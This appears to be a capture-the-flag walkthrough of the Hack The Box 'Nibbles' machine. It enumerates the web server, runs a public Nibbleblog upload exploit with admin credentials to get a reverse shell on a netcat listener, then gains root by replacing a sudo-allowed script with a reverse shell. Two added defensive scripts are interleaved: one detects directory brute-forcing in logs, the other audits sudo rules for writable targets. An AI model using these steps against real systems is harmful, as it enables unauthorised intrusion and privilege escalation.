
Ping

ping 10.10.10.75 

Nmap default Scan

nmap 10.10.10.75 -oN dnmap

Nmap Script and Service Scan

nmap 10.10.10.75 -sC -sV -A -oN snmap

Nmap All Port Scan

nmap -p- --min-rate 10000 10.10.10.75 -sC -sV -A -oN anmap

No hidden ports.

On port 80, nothing interesting on the main page.

In the page source there is a reference to a /nibbleblog directory, so there must be something there.

On /nibbleblog: Coool…!

Gobuster Scan

gobuster dir -u http://10.10.10.75/nibbleblog -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -x php,html,txt,bak,conf -s 200,204,301,302,307,403 -k --status-codes "" -o gobuster1.txt

Found some interesting directories.

ffuf Scan

ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.10.75/nibbleblog/FUZZ -t 100 -o ffuf.txt
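Scans like the gobuster and ffuf runs above leave a very recognisable trace in the web server's access log: one client producing a burst of 404 responses across many distinct paths. As an added defensive example (not part of this writeup or the Nibbles box), the following POSIX shell script counts not-found responses and distinct missing paths per client over a few constructed Apache combined-log lines. It keys on the 404 pattern rather than the User-Agent, since a scanner can set that header to anything. The IPs, timestamps and paths in the sample are made up.

```shell
#!/bin/sh
# Added detection example, not code from the writeup: flag clients whose
# request pattern looks like directory brute-forcing, based on the volume of
# 404 responses and how many different missing paths they asked for.

# Constructed Apache combined-log sample (hypothetical IPs, times and paths).
sample_access_log() {
cat <<'EOF'
10.0.0.7 - - [10/Jan/2024:10:00:01 +0000] "GET /nibbleblog/ HTTP/1.1" 200 2310 "-" "Mozilla/5.0"
10.0.0.7 - - [10/Jan/2024:10:00:02 +0000] "GET /nibbleblog/themes/simpler/css/main.css HTTP/1.1" 200 4120 "-" "Mozilla/5.0"
10.0.0.7 - - [10/Jan/2024:10:00:03 +0000] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0"
10.10.14.5 - - [10/Jan/2024:10:05:00 +0000] "GET /nibbleblog/admin HTTP/1.1" 404 209 "-" "gobuster/3.1"
10.10.14.5 - - [10/Jan/2024:10:05:00 +0000] "GET /nibbleblog/backup HTTP/1.1" 404 209 "-" "gobuster/3.1"
10.10.14.5 - - [10/Jan/2024:10:05:00 +0000] "GET /nibbleblog/old HTTP/1.1" 404 209 "-" "gobuster/3.1"
10.10.14.5 - - [10/Jan/2024:10:05:01 +0000] "GET /nibbleblog/test HTTP/1.1" 404 209 "-" "gobuster/3.1"
10.10.14.5 - - [10/Jan/2024:10:05:01 +0000] "GET /nibbleblog/admin.php HTTP/1.1" 403 301 "-" "gobuster/3.1"
10.10.14.5 - - [10/Jan/2024:10:05:01 +0000] "GET /nibbleblog/dev HTTP/1.1" 404 209 "-" "gobuster/3.1"
10.10.14.5 - - [10/Jan/2024:10:05:02 +0000] "GET /nibbleblog/admin HTTP/1.1" 404 209 "-" "gobuster/3.1"
EOF
}

# enum_suspects MIN_404   (reads combined-log lines on stdin)
# Prints "ip total_404 distinct_404_paths" for each client that produced at
# least MIN_404 not-found responses, sorted by ip. Clients below the
# threshold (normal users who miss a favicon) print nothing.
enum_suspects() {
    awk -v min="$1" '
        # combined log fields: $1 client, $7 request path, $9 status code
        $9 == "404" {
            total[$1]++
            if (!seen[$1 SUBSEP $7]++) distinct[$1]++
        }
        END {
            for (ip in total)
                if (total[ip] + 0 >= min + 0)
                    printf "%s %d %d\n", ip, total[ip], distinct[ip]
        }' | sort
}

# Demo over the constructed sample: only the scanning client should appear.
sample_access_log | enum_suspects 5
```

To run it against a real server, replace the sample with `tail -n 5000 /var/log/apache2/access.log | enum_suspects 50` and tune the threshold to the site's normal 404 rate; a high distinct-path count with a high total is the signature of wordlist enumeration, while a single hot path repeated many times usually points at a broken link instead.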

Let's read the README file. We got the version info.

Will jump to Initial Foothold…!

Will search for a public exploit. Found one: https://github.com/dix0nym/CVE-2015-6967

Will run the exploit accordingly

python3 exp.py --url http://10.10.10.75/nibbleblog/ --username admin --password nibbles --payload rev.php

Got shell

rlwrap nc -nvlp 443

Let's upgrade the shell

python3 -c 'import pty; pty.spawn("/bin/bash")'

Found user.txt location

find / -type f -name "user.txt" 2>/dev/null
cd /home/nibbler

Got user.txt

Will jump to Privilege escalation…!

Will check our sudo privileges

sudo -l

Interesting…!

Let's check whether there is a file named monitor.sh, or we will create one. There is a zip file.

Will unzip it

unzip personal.zip

Got it…!

Will exploit this to escalate our privileges

The original script

My permission on the file

ls -la

I have full permissions on it, so I removed the original script and replaced it with my reverse shell script.

cat monitor.sh

Now we can run this script with sudo

chmod +x monitor.sh
sudo ./monitor.sh

Set up listener to catch reverse shell

rlwrap nc -nvlp 443

Coool, got shell as root…!
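The root cause of this escalation is a sudo rule whose command target sits in a location the invoking user controls: the script can be replaced and the rule still runs it as root. As an added defensive check (not part of this writeup or the Nibbles box), the following POSIX shell script reads sudoers-style rule lines from a file, extracts each command path and reports targets that are missing, world- or group-writable, located in a writable or non-root-owned directory, or not owned by the expected owner. The sudoers fragment in the demo is constructed, and the rules, user names and paths in it are hypothetical; the expected-owner argument exists only so the demo works when run as a regular user, and a real audit omits it so that root is required.

```shell
#!/bin/sh
# Added defensive audit, not code from the writeup: find sudo rules whose
# command target could be tampered with by a non-root user. Parses
# /etc/sudoers-style lines such as
#   user ALL=(root) NOPASSWD: /path/to/script.sh, /path/to/other
# and never needs sudo itself.

# classify_path PATH [EXPECTED_OWNER]
# Prints exactly one status word for PATH: MISSING, WORLD_WRITABLE,
# GROUP_WRITABLE, DIR_WRITABLE, NONROOT_OWNER or OK. EXPECTED_OWNER defaults
# to root. Permission bits are read from `ls -ld` so the check is portable.
classify_path() {
    p=$1
    want=${2:-root}
    [ -e "$p" ] || { printf 'MISSING\n'; return 0; }
    perms=$(ls -ld "$p" | cut -c1-10)
    owner=$(ls -ld "$p" | awk '{print $3}')
    case "$perms" in
        ????????w?) printf 'WORLD_WRITABLE\n'; return 0 ;;
        ?????w????) printf 'GROUP_WRITABLE\n'; return 0 ;;
    esac
    # A target inside a directory the user can write to can be deleted and
    # recreated, which is what happened to monitor.sh above, so the parent
    # directory is checked with the same rules as the file.
    dir=$(dirname "$p")
    dperms=$(ls -ld "$dir" | cut -c1-10)
    downer=$(ls -ld "$dir" | awk '{print $3}')
    case "$dperms" in
        ????????w?|?????w????) printf 'DIR_WRITABLE\n'; return 0 ;;
    esac
    [ "$downer" = "$want" ] || { printf 'DIR_WRITABLE\n'; return 0; }
    [ "$owner" = "$want" ] || { printf 'NONROOT_OWNER\n'; return 0; }
    printf 'OK\n'
}

# audit_sudoers FILE [EXPECTED_OWNER]
# Emits one "STATUS /path" line per absolute command path found in FILE.
# Comments, blank lines and Defaults lines are skipped; the ALL keyword and
# other non-path commands are ignored because they name no file to inspect.
audit_sudoers() {
    file=$1
    want=${2:-root}
    grep -v '^[[:space:]]*#' "$file" | grep -v '^[[:space:]]*$' | grep -v '^Defaults' \
    | sed 's/^[^=]*=//' | tr ',' '\n' \
    | sed 's/([^)]*)//; s/NOPASSWD://; s/PASSWD://; s/SETENV://' \
    | awk '{print $1}' | grep '^/' \
    | while read -r cmd; do
        printf '%s %s\n' "$(classify_path "$cmd" "$want")" "$cmd"
    done
}

# Demo on a constructed sudoers fragment in a throwaway directory. The
# current user is passed as the expected owner only so the demo is meaningful
# without root; a real run is `audit_sudoers /etc/sudoers` as root.
demo() {
    d=$(mktemp -d) || return 1
    mkdir "$d/scripts" && chmod 755 "$d/scripts"
    printf '#!/bin/sh\necho ok\n' > "$d/scripts/monitor.sh"
    chmod 777 "$d/scripts/monitor.sh"          # the dangerous case
    printf '#!/bin/sh\necho ok\n' > "$d/scripts/backup.sh"
    chmod 755 "$d/scripts/backup.sh"           # the acceptable case
    cat > "$d/sudoers.sample" <<EOF
Defaults env_reset
root ALL=(ALL:ALL) ALL
# hypothetical rules for the demo
alice ALL=(root) NOPASSWD: $d/scripts/monitor.sh, $d/scripts/backup.sh
bob   ALL=(root) /usr/bin/hypothetical_missing_tool
EOF
    audit_sudoers "$d/sudoers.sample" "$(id -un)"
    rm -rf "$d"
}
demo
```

Anything other than OK deserves a fix on the host rather than in the rule: move the script to a root-owned directory such as /usr/local/sbin with mode 755, or drop the rule if nobody needs it. The parser handles the common single-line form; rules that use aliases (Cmnd_Alias) or backslash line continuations would need the alias expanded before auditing.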

Will get root.txt

I’m done with Nibbles…:)